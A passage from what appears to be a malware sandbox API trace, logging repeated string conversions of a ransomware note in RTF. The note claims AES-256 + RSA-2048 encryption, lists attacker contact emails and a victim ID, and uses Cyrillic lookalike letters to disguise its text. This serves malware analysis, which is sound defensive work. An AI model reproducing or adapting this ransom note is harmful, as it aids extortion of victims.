lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in 